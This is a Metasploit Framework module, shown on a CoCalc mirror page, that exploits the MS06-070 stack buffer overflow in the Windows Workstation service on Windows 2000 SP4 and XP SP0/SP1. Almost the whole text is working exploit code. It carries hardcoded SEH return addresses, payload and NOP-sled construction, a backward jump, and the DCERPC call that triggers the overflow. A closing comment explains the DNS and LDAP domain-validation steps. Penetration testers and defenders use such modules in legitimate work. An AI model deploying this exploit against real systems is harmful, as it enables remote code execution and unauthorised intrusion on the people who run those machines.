Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms06_070_wkssvc.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ManualRanking # Requires valid/working DOMAIN + DC
8
9
include Msf::Exploit::Remote::DCERPC
10
include Msf::Exploit::Remote::SMB::Client
11
include Msf::Exploit::Seh
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow',
18
'Description' => %q{
19
This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect
20
function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.
21
22
In order to exploit this vulnerability, you must specify the name of a
23
valid Windows DOMAIN. It may be possible to satisfy this condition by using
24
a custom DNS and LDAP setup, however that method is not covered here.
25
26
Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator
27
credentials are required to reach the vulnerable code. Windows XP SP1 only
28
requires valid user credentials. Also, testing shows that a machine already
29
joined to a domain is not exploitable.
30
},
31
'Author' => [
32
'jduck'
33
],
34
'License' => MSF_LICENSE,
35
'References' => [
36
[ 'CVE', '2006-4691' ],
37
[ 'OSVDB', '30263' ],
38
[ 'BID', '20985' ],
39
[ 'MSB', 'MS06-070' ],
40
],
41
'DefaultOptions' => {
42
'EXITFUNC' => 'thread',
43
},
44
'Privileged' => true,
45
'Payload' => {
46
'Space' => 1024,
47
'BadChars' => "\x00",
48
'StackAdjustment' => -3500,
49
},
50
'Platform' => 'win',
51
'Targets' => [
52
[ 'Automatic Targetting', {} ],
53
[
54
'Windows 2000 SP4',
55
{
56
'Offset' => (1058 * 2),
57
'Ret' => 0x75022ac4 # pop/pop/ret in ws2help.dll
58
}
59
],
60
[
61
'Windows XP SP0/SP1',
62
{
63
'Offset' => (1290 * 2),
64
'Ret' => 0x71ab21cd # pop/pop/ret in ws2_32.dll
65
}
66
]
67
],
68
'DefaultTarget' => 0,
69
'DisclosureDate' => '2006-11-14',
70
'Notes' => {
71
'Reliability' => UNKNOWN_RELIABILITY,
72
'Stability' => UNKNOWN_STABILITY,
73
'SideEffects' => UNKNOWN_SIDE_EFFECTS
74
}
75
)
76
)
77
78
register_options(
79
[
80
OptString.new('SMBPIPE', [ true, "The pipe name to use.", 'WKSSVC']),
81
# NOTE: a valid domain name is required. See description.
82
OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."])
83
]
84
)
85
86
deregister_options('SMB::ProtocolVersion')
87
end
88
89
def exploit
90
connect(versions: [1])
91
smb_login()
92
93
mytarget = nil
94
if (target.name =~ /Automatic/)
95
case smb_peer_os()
96
when 'Windows 5.0'
97
print_status("Detected a Windows 2000 target")
98
mytarget = targets[1]
99
when 'Windows 5.1'
100
begin
101
smb_create("\\SRVSVC")
102
print_status("Detected a Windows XP SP0/SP1 target")
103
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
104
if (e.error_code == 0xc0000022)
105
fail_with(Failure::Unknown, "Windows XP SP2 requires Administrator privileges!")
106
end
107
print_status("Detected a Windows XP target (unknown patch level)")
108
end
109
mytarget = targets[2]
110
else
111
fail_with(Failure::NoTarget, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
112
end
113
else
114
mytarget = target
115
end
116
117
handle = dcerpc_handle(
118
'6bffd098-a112-3610-9833-46c3f87e345a', '1.0',
119
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
120
)
121
122
print_status("Binding to #{handle} ...")
123
dcerpc_bind(handle)
124
print_status("Bound to #{handle} ...")
125
126
print_status("Building the stub data...")
127
128
distance = mytarget['Offset']
129
hostname = make_nops(distance - payload.encoded.length)
130
hostname << payload.encoded
131
hostname << generate_seh_record(mytarget.ret)
132
hostname << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
133
134
name = datastore['DOMAIN'] + "\\\\L"
135
name = Rex::Text.to_unicode(name)
136
name << hostname
137
name << Rex::Text.to_unicode(rand_text_alphanumeric(1000) * 3)
138
name << "\x00\x00"
139
140
stub =
141
NDR.uwstring("\\\\#{datastore['RHOST']}") +
142
NDR.UnicodeConformantVaryingStringPreBuilt(name) +
143
NDR.uwstring("") +
144
NDR.uwstring("") +
145
NDR.long(0) +
146
NDR.long(1)
147
148
print_status("Calling the vulnerable function...")
149
150
begin
151
dcerpc.call(0x16, stub)
152
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
153
rescue => e
154
if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
155
raise e
156
end
157
end
158
159
# Cleanup
160
handler
161
disconnect
162
end
163
end
164
165
=begin
166
167
The IDL for NetrJoinDomain2 looks like this:
168
long _NetrJoinDomain2@28 (
169
[in][unique][string] wchar_t * arg_1,
170
[in][string] wchar_t * arg_2,
171
[in][unique][string] wchar_t * arg_3,
172
[in][unique][string] wchar_t * arg_4,
173
[in][unique] struct_C * arg_5,
174
[in] long arg_6
175
);
176
177
178
1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN
179
2. <-- dns server - response including answer and additional record.
180
answer: whateverserver.DOMAIN priority 0 / weight 100 / port 389
181
additional: IN.A address of whateverserver.DOMAIN
182
3. --> ldap server - baseObject query with filter/attributes:
183
- filter: (&(&(DnsDomain=DOMAIN)(Host=TARGETHOSTNAME))(NtVer=06:00:00:00))
184
- attributes: AttributeDescriptionList: NetLogon
185
4. <-- ldap server - searchResDone success, attributes data
186
- PartialAttributeList netlogon - 1 item
187
- type 23, flags 0x1fd, domain GUID,
188
forest, domain, hostname, netbios domain, netbios hostname,
189
user, site, client site, version, lmtoken, nttoken
190
5. validated.
191
192
=end
193
194